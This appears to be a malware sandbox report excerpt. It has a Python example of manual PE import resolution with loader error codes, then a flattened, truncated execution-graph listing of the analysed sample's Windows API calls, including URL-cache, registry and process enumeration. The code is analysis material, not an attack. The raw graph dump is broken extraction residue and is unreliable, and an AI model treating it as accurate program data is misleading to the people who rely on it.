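"""Manual PE import resolution with the Win32 error codes a loader sets on failure.

Added example, not code recovered from the analysed sample. RVAs index the
buffer directly (the image is treated as already mapped), and `modules` is a
constructed {dll name -> {export name or ordinal -> address}} table that stands
in for LoadLibraryA/GetProcAddress. Both are assumptions of this example.
"""
import struct

DESC_SIZE = 0x14                  # sizeof(IMAGE_IMPORT_DESCRIPTOR): 5 DWORDs
IMAGE_ORDINAL_FLAG32 = 0x80000000
ERROR_MOD_NOT_FOUND = 0x7E        # 126
ERROR_PROC_NOT_FOUND = 0x7F       # 127


def is_readable(image: bytes, rva: int, size: int) -> bool:
    """Stand-in for IsBadReadPtr(ptr, size): True when [rva, rva+size) lies inside the image."""
    return 0 <= rva and rva + size <= len(image)


def cstring(image: bytes, rva: int) -> str:
    end = image.index(b"\0", rva)
    return image[rva:end].decode("ascii")


def resolve_imports(image: bytearray, import_dir_rva: int, modules: dict) -> tuple:
    """Walk the IMAGE_IMPORT_DESCRIPTOR array and patch every FirstThunk (IAT) slot.

    Returns (success, last_error, resolved); last_error mimics what GetLastError
    would report after the loader gave up.
    """
    last_error = 0
    resolved = {}
    rva = import_dir_rva
    while True:
        if not is_readable(image, rva, DESC_SIZE):        # IsBadReadPtr(desc, 0x14)
            return False, last_error, resolved
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from("<5I", image, rva)
        if name_rva == 0:                                  # all-zero terminator descriptor
            return True, last_error, resolved
        dll = cstring(image, name_rva).lower()
        exports = modules.get(dll)                         # LoadLibraryA / GetModuleHandleA stand-in
        if exports is None:
            last_error = ERROR_MOD_NOT_FOUND               # SetLastError(0x7E)
            return False, last_error, resolved
        lookup = oft or ft                                 # no OriginalFirstThunk: read names from the IAT itself
        idx = 0
        while True:
            entry, = struct.unpack_from("<I", image, lookup + 4 * idx)
            if entry == 0:
                break
            if entry & IMAGE_ORDINAL_FLAG32:
                key = entry & 0xFFFF                       # import by ordinal
            else:
                key = cstring(image, entry + 2)            # IMAGE_IMPORT_BY_NAME: skip the 2-byte hint
            addr = exports.get(key)                        # GetProcAddress stand-in
            if addr is None:
                last_error = ERROR_PROC_NOT_FOUND          # SetLastError(0x7F)
                return False, last_error, resolved
            struct.pack_into("<I", image, ft + 4 * idx, addr)
            resolved[(dll, key)] = addr
            idx += 1
        rva += DESC_SIZE


def build_image() -> tuple:
    """Constructed image: imports from KERNEL32.dll (two names, one ordinal) and MISSING.dll."""
    img = bytearray(0x400)

    def put(off, data):
        img[off:off + len(data)] = data

    put(0x300, b"KERNEL32.dll\0")
    put(0x310, b"MISSING.dll\0")
    put(0x320, b"\0\0CreateFileW\0")          # IMAGE_IMPORT_BY_NAME: hint + name
    put(0x330, b"\0\0CloseHandle\0")
    put(0x340, b"\0\0Foo\0")
    thunks = struct.pack("<4I", 0x320, 0x330, IMAGE_ORDINAL_FLAG32 | 5, 0)
    put(0x200, thunks)                         # OriginalFirstThunk for KERNEL32
    put(0x220, thunks)                         # FirstThunk (IAT) for KERNEL32, patched in place
    put(0x240, struct.pack("<2I", 0x340, 0))   # OriginalFirstThunk for MISSING
    put(0x260, struct.pack("<2I", 0x340, 0))   # FirstThunk (IAT) for MISSING
    descs = (struct.pack("<5I", 0x200, 0, 0, 0x300, 0x220)
             + struct.pack("<5I", 0x240, 0, 0, 0x310, 0x260)
             + bytes(DESC_SIZE))               # zero terminator
    put(0x100, descs)
    return img, 0x100


KERNEL32_EXPORTS = {"CreateFileW": 0x7FF00010, "CloseHandle": 0x7FF00020, 5: 0x7FF00050}


def iat_slots(image: bytes, ft: int, count: int) -> list:
    """Read `count` IAT entries starting at RVA `ft`, to inspect what was patched."""
    return list(struct.unpack_from(f"<{count}I", image, ft))


if __name__ == "__main__":
    img, directory = build_image()
    print(resolve_imports(img, directory, {"kernel32.dll": KERNEL32_EXPORTS}))
    print([hex(v) for v in iat_slots(img, 0x220, 4)])
```

With only kernel32.dll in the module table the walk patches the three KERNEL32 slots and then stops on MISSING.dll with ERROR_MOD_NOT_FOUND; supplying that module too lets it finish, and a module that lacks the requested export ends in ERROR_PROC_NOT_FOUND. When reversing a loader like this, the SetLastError(0x7E)/SetLastError(0x7F) sites are the cheapest place to break and read back which DLL or export name the injected payload was trying to resolve.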

Execution Graph

Execution Coverage: 5.7%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 59

[Execution graph data omitted: the interactive graph was flattened during extraction into a raw listing of node ids, addresses, API names and edges, and that listing is cut off mid-stream. What the visible part shows: the graph is rooted at the CRT start-up routine at 0x4466f4 (GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, GetEnvironmentStringsW, GetStartupInfoW, then exit / _cexit), which calls the application's main routine at 0x41276d. That routine loads a library at 0x4044a4 (LoadLibraryW, with FreeLibrary and MessageBoxW branches), calls SetErrorMode, GetModuleHandleW and EnumResourceTypesW (0x412794), builds a module path with GetSystemDirectoryW and loads it with LoadLibraryW (0x40a804), reads and writes INI settings with GetPrivateProfileStringW, GetPrivateProfileIntW and WritePrivateProfileStringW (0x40d65d, 0x40d702, 0x40d76e, 0x40daef), and then runs a GUI: CoInitialize, RegisterClassW and CreateWindowExW (0x4123e2), ShowWindow, UpdateWindow and LoadAcceleratorsW (0x412873), a GetMessageW / TranslateAcceleratorW / IsDialogMessageW / TranslateMessage / DispatchMessageW message loop, and CoUninitialize on exit (0x412957). Other leaves visible in the listing: GetModuleFileNameW (0x409bca), EnumResourceNamesW (0x40dc9c), LoadStringW (0x40daac), CreateFontIndirectW (0x409cdb), LoadIconW (0x401134), LoadCursorW / SetCursor (0x40969c), GetFileAttributesW (0x409b98), CloseHandle (0x414770), SendMessageW (0x40ea13) and qsort (0x4111a6).]
38252->38253 38254 40aa04 free 38253->38254 38255 40ea98 38254->38255 38256 40aa04 free 38255->38256 38257 40eaa0 38256->38257 38258 40a9ce 4 API calls 38257->38258 38259 40eab3 38258->38259 38260 40a9ce 4 API calls 38259->38260 38261 40eabd 38260->38261 38262 40a9ce 4 API calls 38261->38262 38263 40eac7 38262->38263 38264 40a9ce 4 API calls 38263->38264 38265 40ead1 38264->38265 38265->38238 38266->38196 38267->38200 38325 40b2cc 38268->38325 38270 402b0a 38271 40b2cc 27 API calls 38270->38271 38272 402b23 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402b3a 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402b54 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402b6b 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402b82 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402b99 38281->38282 38283 40b2cc 27 API calls 38282->38283 38284 402bb0 38283->38284 38285 40b2cc 27 API calls 38284->38285 38286 402bc7 38285->38286 38287 40b2cc 27 API calls 38286->38287 38288 402bde 38287->38288 38289 40b2cc 27 API calls 38288->38289 38290 402bf5 38289->38290 38291 40b2cc 27 API calls 38290->38291 38292 402c0c 38291->38292 38293 40b2cc 27 API calls 38292->38293 38294 402c23 38293->38294 38295 40b2cc 27 API calls 38294->38295 38296 402c3a 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402c51 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402c68 38299->38300 38301 40b2cc 27 API calls 38300->38301 38302 402c7f 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402c99 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402cb3 38305->38306 38307 40b2cc 27 API calls 38306->38307 38308 402cd5 38307->38308 38309 40b2cc 27 API calls 38308->38309 38310 402cf0 38309->38310 38311 40b2cc 27 API calls 38310->38311 38312 402d0b 38311->38312 38313 40b2cc 27 API calls 38312->38313 38314 402d26 38313->38314 38315 40b2cc 27 API calls 38314->38315 38316 402d3e 38315->38316 38317 40b2cc 27 API calls 38316->38317 
38318 402d59 38317->38318 38319 40b2cc 27 API calls 38318->38319 38320 402d78 38319->38320 38321 40b2cc 27 API calls 38320->38321 38322 402d93 38321->38322 38323 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38322->38323 38323->38204 38324->38194 38328 40b58d 38325->38328 38327 40b2d1 38327->38270 38329 40b5a4 GetModuleHandleW FindResourceW 38328->38329 38330 40b62e 38328->38330 38331 40b5c2 LoadResource 38329->38331 38332 40b5e7 38329->38332 38330->38327 38331->38332 38333 40b5d0 SizeofResource LockResource 38331->38333 38332->38330 38341 40afcf 38332->38341 38333->38332 38335 40b608 memcpy 38344 40b4d3 memcpy 38335->38344 38337 40b61e 38345 40b3c1 18 API calls 38337->38345 38339 40b626 38346 40b04b 38339->38346 38342 40b04b ??3@YAXPAX 38341->38342 38343 40afd7 ??2@YAPAXI 38342->38343 38343->38335 38344->38337 38345->38339 38347 40b051 ??3@YAXPAX 38346->38347 38348 40b05f 38346->38348 38347->38348 38348->38330 38349->38213 38351 444a64 FreeLibrary 38350->38351 38352 444a83 38350->38352 38351->38352 38352->38215 38354 4032c4 38353->38354 38355 40b633 free 38354->38355 38356 403316 38355->38356 38372 44553b 38356->38372 38360 403480 38570 40368c 15 API calls 38360->38570 38362 403489 38363 40b633 free 38362->38363 38364 403495 38363->38364 38364->38215 38365 4033a9 memset memcpy 38366 4033ec wcscmp 38365->38366 38367 40333c 38365->38367 38366->38367 38367->38360 38367->38365 38367->38366 38568 4028e7 11 API calls 38367->38568 38569 40f508 6 API calls 38367->38569 38370 403421 _wcsicmp 38370->38367 38371->38210 38373 445548 38372->38373 38374 445599 38373->38374 38571 40c768 38373->38571 38375 4455a8 memset 38374->38375 38383 4457f2 38374->38383 38655 403988 38375->38655 38381 4455e5 38389 445672 38381->38389 38400 44560f 38381->38400 38423 445854 38383->38423 38758 403e2d memset memset memset memset memset 38383->38758 38384 4458bb memset memset 38386 414c2e 16 API calls 38384->38386 38393 4458f9 38386->38393 38387 44557a 
38394 44558c 38387->38394 38635 4136c0 38387->38635 38666 403fbe memset memset memset memset memset 38389->38666 38390 4459ed 38396 445a00 memset memset 38390->38396 38397 445b22 38390->38397 38391 44595e memset memset 38392 414c2e 16 API calls 38391->38392 38398 44599c 38392->38398 38399 40b2cc 27 API calls 38393->38399 38639 444b06 38394->38639 38407 414c2e 16 API calls 38396->38407 38403 445bca 38397->38403 38404 445b38 memset memset memset 38397->38404 38408 40b2cc 27 API calls 38398->38408 38409 445909 38399->38409 38411 4087b3 335 API calls 38400->38411 38402 445849 38849 40b1ab free free 38402->38849 38410 445c8b memset memset 38403->38410 38476 445cf0 38403->38476 38414 445bd4 38404->38414 38415 445b98 38404->38415 38416 445a3e 38407->38416 38424 4459ac 38408->38424 38420 409d1f 6 API calls 38409->38420 38425 414c2e 16 API calls 38410->38425 38421 445621 38411->38421 38413 44589f 38850 40b1ab free free 38413->38850 38804 414c2e 38414->38804 38415->38414 38427 445ba2 38415->38427 38430 40b2cc 27 API calls 38416->38430 38419 403335 38567 4452e5 43 API calls 38419->38567 38437 445919 38420->38437 38835 4454bf 20 API calls 38421->38835 38422 445823 38422->38402 38445 4087b3 335 API calls 38422->38445 38431 4458aa 38423->38431 38781 403c9c memset memset memset memset memset 38423->38781 38438 409d1f 6 API calls 38424->38438 38439 445cc9 38425->38439 38940 4099c6 wcslen 38427->38940 38428 4456b2 38837 40b1ab free free 38428->38837 38432 445a4f 38430->38432 38431->38384 38463 44594a 38431->38463 38442 409d1f 6 API calls 38432->38442 38435 445d3d 38462 40b2cc 27 API calls 38435->38462 38436 445d88 memset memset memset 38446 414c2e 16 API calls 38436->38446 38851 409b98 GetFileAttributesW 38437->38851 38447 4459bc 38438->38447 38448 409d1f 6 API calls 38439->38448 38440 445879 38440->38413 38458 4087b3 335 API calls 38440->38458 38451 445a63 38442->38451 38443 40b2cc 27 API calls 38452 445bf3 38443->38452 38445->38422 38455 445dde 38446->38455 38916 409b98 
GetFileAttributesW 38447->38916 38457 445ce1 38448->38457 38449 445bb3 38943 445403 memset 38449->38943 38450 445680 38450->38428 38689 4087b3 memset 38450->38689 38460 40b2cc 27 API calls 38451->38460 38820 409d1f wcslen wcslen 38452->38820 38453 445928 38453->38463 38852 40b6ef 38453->38852 38464 40b2cc 27 API calls 38455->38464 38960 409b98 GetFileAttributesW 38457->38960 38458->38440 38469 445a94 38460->38469 38472 445d54 _wcsicmp 38462->38472 38463->38390 38463->38391 38475 445def 38464->38475 38465 4459cb 38465->38390 38484 40b6ef 249 API calls 38465->38484 38917 40ae18 38469->38917 38470 44566d 38470->38383 38740 413d4c 38470->38740 38481 445d71 38472->38481 38544 445d67 38472->38544 38474 445665 38836 40b1ab free free 38474->38836 38482 409d1f 6 API calls 38475->38482 38476->38419 38476->38435 38476->38436 38477 445389 255 API calls 38477->38403 38961 445093 23 API calls 38481->38961 38489 445e03 38482->38489 38484->38390 38485 4456d8 38491 40b2cc 27 API calls 38485->38491 38488 44563c 38488->38474 38494 4087b3 335 API calls 38488->38494 38962 409b98 GetFileAttributesW 38489->38962 38490 40b6ef 249 API calls 38490->38419 38496 4456e2 38491->38496 38492 40b2cc 27 API calls 38497 445c23 38492->38497 38493 445d83 38493->38419 38494->38488 38838 413fa6 _wcsicmp _wcsicmp 38496->38838 38501 409d1f 6 API calls 38497->38501 38499 445e12 38505 445e6b 38499->38505 38512 40b2cc 27 API calls 38499->38512 38503 445c37 38501->38503 38502 4456eb 38508 4456fd memset memset memset memset 38502->38508 38509 4457ea 38502->38509 38510 445389 255 API calls 38503->38510 38504 445b17 38937 40aebe 38504->38937 38964 445093 23 API calls 38505->38964 38839 409c70 wcscpy wcsrchr 38508->38839 38842 413d29 38509->38842 38515 445c47 38510->38515 38516 445e33 38512->38516 38513 445e7e 38518 445f67 38513->38518 38521 40b2cc 27 API calls 38515->38521 38522 409d1f 6 API calls 38516->38522 38527 40b2cc 27 API calls 38518->38527 38519 445ab2 memset 38523 40b2cc 27 API calls 38519->38523 38525 
445c53 38521->38525 38526 445e47 38522->38526 38528 445aa1 38523->38528 38524 409c70 2 API calls 38529 44577e 38524->38529 38530 409d1f 6 API calls 38525->38530 38963 409b98 GetFileAttributesW 38526->38963 38532 445f73 38527->38532 38528->38504 38528->38519 38533 409d1f 6 API calls 38528->38533 38543 445389 255 API calls 38528->38543 38924 40add4 38528->38924 38929 40ae51 38528->38929 38534 409c70 2 API calls 38529->38534 38535 445c67 38530->38535 38537 409d1f 6 API calls 38532->38537 38533->38528 38539 44578d 38534->38539 38540 445389 255 API calls 38535->38540 38536 445e56 38536->38505 38542 445e83 memset 38536->38542 38538 445f87 38537->38538 38967 409b98 GetFileAttributesW 38538->38967 38539->38509 38546 40b2cc 27 API calls 38539->38546 38540->38403 38545 40b2cc 27 API calls 38542->38545 38543->38528 38544->38419 38544->38490 38547 445eab 38545->38547 38548 4457a8 38546->38548 38549 409d1f 6 API calls 38547->38549 38550 409d1f 6 API calls 38548->38550 38551 445ebf 38549->38551 38552 4457b8 38550->38552 38553 40ae18 9 API calls 38551->38553 38841 409b98 GetFileAttributesW 38552->38841 38563 445ef5 38553->38563 38555 4457c7 38555->38509 38557 4087b3 335 API calls 38555->38557 38556 40ae51 9 API calls 38556->38563 38557->38509 38558 445f5c 38560 40aebe FindClose 38558->38560 38559 40add4 2 API calls 38559->38563 38560->38518 38561 40b2cc 27 API calls 38561->38563 38562 409d1f 6 API calls 38562->38563 38563->38556 38563->38558 38563->38559 38563->38561 38563->38562 38565 445f3a 38563->38565 38965 409b98 GetFileAttributesW 38563->38965 38966 445093 23 API calls 38565->38966 38567->38367 38568->38370 38569->38367 38570->38362 38572 40c775 38571->38572 38968 40b1ab free free 38572->38968 38574 40c788 38969 40b1ab free free 38574->38969 38576 40c790 38970 40b1ab free free 38576->38970 38578 40c798 38579 40aa04 free 38578->38579 38580 40c7a0 38579->38580 38971 40c274 memset 38580->38971 38585 40a8ab 9 API calls 38586 40c7c3 38585->38586 38587 40a8ab 9 API calls 
38586->38587 38588 40c7d0 38587->38588 39000 40c3c3 38588->39000 38592 40c877 38601 40bdb0 38592->38601 38593 40c86c 39028 4053fe 37 API calls 38593->39028 38596 40c813 _wcslwr 39026 40c634 47 API calls 38596->39026 38598 40c829 wcslen 38599 40c7e5 38598->38599 38599->38592 38599->38593 39025 40a706 wcslen memcpy 38599->39025 39027 40c634 47 API calls 38599->39027 39162 404363 38601->39162 38606 40b2cc 27 API calls 38607 40be02 wcslen 38606->38607 38608 40bf5d 38607->38608 38616 40be1e 38607->38616 39179 40440c 38608->39179 38609 40be26 wcsncmp 38609->38616 38612 40be7d memset 38613 40bea7 memcpy 38612->38613 38612->38616 38614 40bf11 wcschr 38613->38614 38613->38616 38614->38616 38615 40b2cc 27 API calls 38617 40bef6 _wcsnicmp 38615->38617 38616->38608 38616->38609 38616->38612 38616->38613 38616->38614 38616->38615 38618 40bf43 LocalFree 38616->38618 39182 40bd5d 28 API calls 38616->39182 39183 404423 38616->39183 38617->38614 38617->38616 38618->38616 38619 4135f7 39195 4135e0 38619->39195 38622 40b2cc 27 API calls 38623 41360d 38622->38623 38624 40a804 8 API calls 38623->38624 38625 413613 38624->38625 38626 41363e 38625->38626 38627 40b273 27 API calls 38625->38627 38628 4135e0 FreeLibrary 38626->38628 38629 413625 38627->38629 38630 413643 38628->38630 38629->38626 38631 413648 38629->38631 38630->38387 38632 413658 38631->38632 38633 4135e0 FreeLibrary 38631->38633 38632->38387 38634 413666 38633->38634 38634->38387 38637 4136e2 38635->38637 38636 413827 38834 41366b FreeLibrary 38636->38834 38637->38636 38638 4137ac CoTaskMemFree 38637->38638 38638->38637 39198 4449b9 38639->39198 38642 444c1f 38642->38374 38643 4449b9 35 API calls 38645 444b4b 38643->38645 38644 444c15 38647 4449b9 35 API calls 38644->38647 38645->38644 39218 444972 GetVersionExW 38645->39218 38647->38642 38648 444b99 memcmp 38653 444b8c 38648->38653 38649 444c0b 39222 444a85 35 API calls 38649->39222 38653->38648 38653->38649 39219 444aa5 35 API calls 38653->39219 39220 40a7a0 
GetVersionExW 38653->39220 39221 444a85 35 API calls 38653->39221 38656 40399d 38655->38656 39223 403a16 38656->39223 38658 403a09 39237 40b1ab free free 38658->39237 38660 4039a3 38660->38658 38664 4039f4 38660->38664 39234 40a02c CreateFileW 38660->39234 38661 403a12 wcsrchr 38661->38381 38664->38658 38665 4099c6 2 API calls 38664->38665 38665->38658 38667 414c2e 16 API calls 38666->38667 38668 404048 38667->38668 38669 414c2e 16 API calls 38668->38669 38670 404056 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 404073 38671->38672 38673 409d1f 6 API calls 38672->38673 38674 40408e 38673->38674 38675 409d1f 6 API calls 38674->38675 38676 4040a6 38675->38676 38677 403af5 20 API calls 38676->38677 38678 4040ba 38677->38678 38679 403af5 20 API calls 38678->38679 38680 4040cb 38679->38680 39264 40414f memset 38680->39264 38682 4040e0 38683 404140 38682->38683 38685 4040ec memset 38682->38685 38687 4099c6 2 API calls 38682->38687 38688 40a8ab 9 API calls 38682->38688 39278 40b1ab free free 38683->39278 38685->38682 38686 404148 38686->38450 38687->38682 38688->38682 39291 40a6e6 WideCharToMultiByte 38689->39291 38691 4087ed 39292 4095d9 memset 38691->39292 38694 408809 memset memset memset memset memset 38695 40b2cc 27 API calls 38694->38695 38696 4088a1 38695->38696 38697 409d1f 6 API calls 38696->38697 38698 4088b1 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 4088c0 38699->38700 38701 409d1f 6 API calls 38700->38701 38702 4088d0 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 4088df 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 4088ef 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 4088fe 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 40890e 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 40891d 38711->38712 38713 409d1f 6 API calls 38712->38713 38738 408953 38738->38450 38741 40b633 free 38740->38741 38742 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38741->38742 38743 413f00 
Process32NextW 38742->38743 38744 413da5 OpenProcess 38743->38744 38745 413f17 CloseHandle 38743->38745 38746 413df3 memset 38744->38746 38749 413eb0 38744->38749 38745->38485 39341 413f27 38746->39341 38748 413ebf free 38748->38749 38749->38743 38749->38748 38750 4099f4 3 API calls 38749->38750 38750->38749 38752 413e37 GetModuleHandleW 38754 413e1f 38752->38754 38755 413e46 38752->38755 38753 413e6a QueryFullProcessImageNameW 38753->38754 38754->38752 38754->38753 39346 413959 38754->39346 39362 413ca4 38754->39362 38755->38754 38757 413ea2 CloseHandle 38757->38749 38759 414c2e 16 API calls 38758->38759 38760 403eb7 38759->38760 38761 414c2e 16 API calls 38760->38761 38762 403ec5 38761->38762 38763 409d1f 6 API calls 38762->38763 38764 403ee2 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 403efd 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403f15 38767->38768 38769 403af5 20 API calls 38768->38769 38770 403f29 38769->38770 38771 403af5 20 API calls 38770->38771 38772 403f3a 38771->38772 38773 40414f 33 API calls 38772->38773 38774 403f4f 38773->38774 38775 403faf 38774->38775 38777 403f5b memset 38774->38777 38779 4099c6 2 API calls 38774->38779 38780 40a8ab 9 API calls 38774->38780 39375 40b1ab free free 38775->39375 38777->38774 38778 403fb7 38778->38422 38779->38774 38780->38774 38782 414c2e 16 API calls 38781->38782 38783 403d26 38782->38783 38784 414c2e 16 API calls 38783->38784 38785 403d34 38784->38785 38786 409d1f 6 API calls 38785->38786 38787 403d51 38786->38787 38788 409d1f 6 API calls 38787->38788 38789 403d6c 38788->38789 38790 409d1f 6 API calls 38789->38790 38791 403d84 38790->38791 38792 403af5 20 API calls 38791->38792 38793 403d98 38792->38793 38794 403af5 20 API calls 38793->38794 38795 403da9 38794->38795 38796 40414f 33 API calls 38795->38796 38797 403dbe 38796->38797 38798 403e1e 38797->38798 38800 403dca memset 38797->38800 38802 4099c6 2 API calls 38797->38802 38803 40a8ab 9 API calls 38797->38803 39376 40b1ab free 
free 38798->39376 38800->38797 38801 403e26 38801->38440 38802->38797 38803->38797 38805 414b81 8 API calls 38804->38805 38806 414c40 38805->38806 38807 414c73 memset 38806->38807 39377 409cea 38806->39377 38808 414c94 38807->38808 39380 414592 RegOpenKeyExW 38808->39380 38812 414c64 SHGetSpecialFolderPathW 38813 414d0b 38812->38813 38813->38443 38814 414cc1 38815 414cf4 wcscpy 38814->38815 39381 414bb0 wcscpy 38814->39381 38815->38813 38817 414cd2 39382 4145ac RegQueryValueExW 38817->39382 38819 414ce9 RegCloseKey 38819->38815 38821 409d43 wcscpy 38820->38821 38823 409d62 38820->38823 38822 409719 2 API calls 38821->38822 38824 409d51 wcscat 38822->38824 38825 445389 38823->38825 38824->38823 38826 40ae18 9 API calls 38825->38826 38828 4453c4 38826->38828 38827 40ae51 9 API calls 38827->38828 38828->38827 38829 4453f3 38828->38829 38831 40add4 2 API calls 38828->38831 38833 445403 250 API calls 38828->38833 38830 40aebe FindClose 38829->38830 38832 4453fe 38830->38832 38831->38828 38832->38492 38833->38828 38834->38394 38835->38488 38836->38470 38837->38470 38838->38502 38840 409c89 38839->38840 38840->38524 38841->38555 38843 413d39 38842->38843 38844 413d2f FreeLibrary 38842->38844 38845 40b633 free 38843->38845 38844->38843 38846 413d42 38845->38846 38847 40b633 free 38846->38847 38848 413d4a 38847->38848 38848->38383 38849->38423 38850->38431 38851->38453 38853 44db70 38852->38853 38854 40b6fc memset 38853->38854 38855 409c70 2 API calls 38854->38855 38856 40b732 wcsrchr 38855->38856 38857 40b743 38856->38857 38858 40b746 memset 38856->38858 38857->38858 38859 40b2cc 27 API calls 38858->38859 38860 40b76f 38859->38860 38861 409d1f 6 API calls 38860->38861 38862 40b783 38861->38862 39383 409b98 GetFileAttributesW 38862->39383 38864 40b792 38865 409c70 2 API calls 38864->38865 38879 40b7c2 38864->38879 38868 40b7a5 38865->38868 38871 40b2cc 27 API calls 38868->38871 38869 40b837 CloseHandle 38873 40b83e memset 38869->38873 38870 40b817 39487 409a45 GetTempPathW 
38870->39487 38874 40b7b2 38871->38874 39417 40a6e6 WideCharToMultiByte 38873->39417 38877 409d1f 6 API calls 38874->38877 38875 40b827 38875->38873 38877->38879 38878 40b866 39418 444432 38878->39418 39384 40bb98 38879->39384 38882 40bad5 38884 40b04b ??3@YAXPAX 38882->38884 38883 40b273 27 API calls 38885 40b89a 38883->38885 38886 40baf3 38884->38886 39464 438552 38885->39464 38886->38463 38889 40bacd 39467 443d90 38889->39467 38892 40bac6 39517 424f26 122 API calls 38892->39517 38893 40b8bd memset 39508 425413 17 API calls 38893->39508 38896 425413 17 API calls 38914 40b8b8 38896->38914 38899 40a71b MultiByteToWideChar 38899->38914 38900 40a734 MultiByteToWideChar 38900->38914 38903 40b9b5 memcmp 38903->38914 38904 4099c6 2 API calls 38904->38914 38905 404423 37 API calls 38905->38914 38908 4251c4 136 API calls 38908->38914 38909 40bb3e memset memcpy 39518 40a734 MultiByteToWideChar 38909->39518 38911 40bb88 LocalFree 38911->38914 38914->38892 38914->38893 38914->38896 38914->38899 38914->38900 38914->38903 38914->38904 38914->38905 38914->38908 38914->38909 38915 40ba5f memcmp 38914->38915 39509 4253ef 16 API calls 38914->39509 39510 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38914->39510 39511 4253af 17 API calls 38914->39511 39512 4253cf 17 API calls 38914->39512 39513 447280 memset 38914->39513 39514 447960 memset memcpy memcpy memcpy 38914->39514 39515 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38914->39515 39516 447920 memcpy memcpy memcpy 38914->39516 38915->38914 38916->38465 38918 40aebe FindClose 38917->38918 38919 40ae21 38918->38919 38920 4099c6 2 API calls 38919->38920 38921 40ae35 38920->38921 38922 409d1f 6 API calls 38921->38922 38923 40ae49 38922->38923 38923->38528 38925 40ade0 38924->38925 38926 40ae0f 38924->38926 38925->38926 38927 40ade7 wcscmp 38925->38927 38926->38528 38927->38926 38928 40adfe wcscmp 38927->38928 38928->38926 38930 40ae7b FindNextFileW 38929->38930 38931 40ae5c FindFirstFileW 38929->38931 38932 40ae94 38930->38932 38933 
40ae8f 38930->38933 38931->38932 38935 40aeb6 38932->38935 38936 409d1f 6 API calls 38932->38936 38934 40aebe FindClose 38933->38934 38934->38932 38935->38528 38936->38935 38938 40aed1 38937->38938 38939 40aec7 FindClose 38937->38939 38938->38397 38939->38938 38941 4099d7 38940->38941 38942 4099da memcpy 38940->38942 38941->38942 38942->38449 38944 40b2cc 27 API calls 38943->38944 38945 44543f 38944->38945 38946 409d1f 6 API calls 38945->38946 38947 44544f 38946->38947 39901 409b98 GetFileAttributesW 38947->39901 38949 44545e 38950 445476 38949->38950 38951 40b6ef 249 API calls 38949->38951 38952 40b2cc 27 API calls 38950->38952 38951->38950 38953 445482 38952->38953 38954 409d1f 6 API calls 38953->38954 38955 445492 38954->38955 39902 409b98 GetFileAttributesW 38955->39902 38957 4454a1 38958 4454b9 38957->38958 38959 40b6ef 249 API calls 38957->38959 38958->38477 38959->38958 38960->38476 38961->38493 38962->38499 38963->38536 38964->38513 38965->38563 38966->38563 38967->38544 38968->38574 38969->38576 38970->38578 38972 414c2e 16 API calls 38971->38972 38973 40c2ae 38972->38973 39029 40c1d3 38973->39029 38978 40c3be 38995 40a8ab 38978->38995 38979 40afcf 2 API calls 38980 40c2fd FindFirstUrlCacheEntryW 38979->38980 38981 40c3b6 38980->38981 38982 40c31e wcschr 38980->38982 38983 40b04b ??3@YAXPAX 38981->38983 38984 40c331 38982->38984 38985 40c35e FindNextUrlCacheEntryW 38982->38985 38983->38978 38986 40a8ab 9 API calls 38984->38986 38985->38982 38987 40c373 GetLastError 38985->38987 38988 40c33e wcschr 38986->38988 38989 40c3ad FindCloseUrlCache 38987->38989 38990 40c37e 38987->38990 38988->38985 38991 40c34f 38988->38991 38989->38981 38992 40afcf 2 API calls 38990->38992 38994 40a8ab 9 API calls 38991->38994 38993 40c391 FindNextUrlCacheEntryW 38992->38993 38993->38982 38993->38989 38994->38985 39123 40a97a 38995->39123 38998 40a8cc 38998->38585 38999 40a8d0 7 API calls 38999->38998 39128 40b1ab free free 39000->39128 39002 40c3dd 39003 40b2cc 27 API calls 
39002->39003 39004 40c3e7 39003->39004 39129 414592 RegOpenKeyExW 39004->39129 39006 40c3f4 39007 40c50e 39006->39007 39008 40c3ff 39006->39008 39022 405337 39007->39022 39009 40a9ce 4 API calls 39008->39009 39010 40c418 memset 39009->39010 39130 40aa1d 39010->39130 39013 40c471 39015 40c47a _wcsupr 39013->39015 39014 40c505 RegCloseKey 39014->39007 39016 40a8d0 7 API calls 39015->39016 39017 40c498 39016->39017 39018 40a8d0 7 API calls 39017->39018 39019 40c4ac memset 39018->39019 39020 40aa1d 39019->39020 39021 40c4e4 RegEnumValueW 39020->39021 39021->39014 39021->39015 39132 405220 39022->39132 39024 405340 39024->38599 39025->38596 39026->38598 39027->38599 39028->38592 39030 40ae18 9 API calls 39029->39030 39039 40c210 39030->39039 39031 40ae51 9 API calls 39031->39039 39032 40c264 39033 40aebe FindClose 39032->39033 39035 40c26f 39033->39035 39034 40add4 2 API calls 39034->39039 39041 40e5ed memset memset 39035->39041 39036 40c231 _wcsicmp 39038 40c248 39036->39038 39036->39039 39037 40c1d3 34 API calls 39037->39039 39054 40c084 21 API calls 39038->39054 39039->39031 39039->39032 39039->39034 39039->39036 39039->39037 39042 414c2e 16 API calls 39041->39042 39043 40e63f 39042->39043 39044 409d1f 6 API calls 39043->39044 39045 40e658 39044->39045 39055 409b98 GetFileAttributesW 39045->39055 39047 40e667 39048 40e680 39047->39048 39049 409d1f 6 API calls 39047->39049 39056 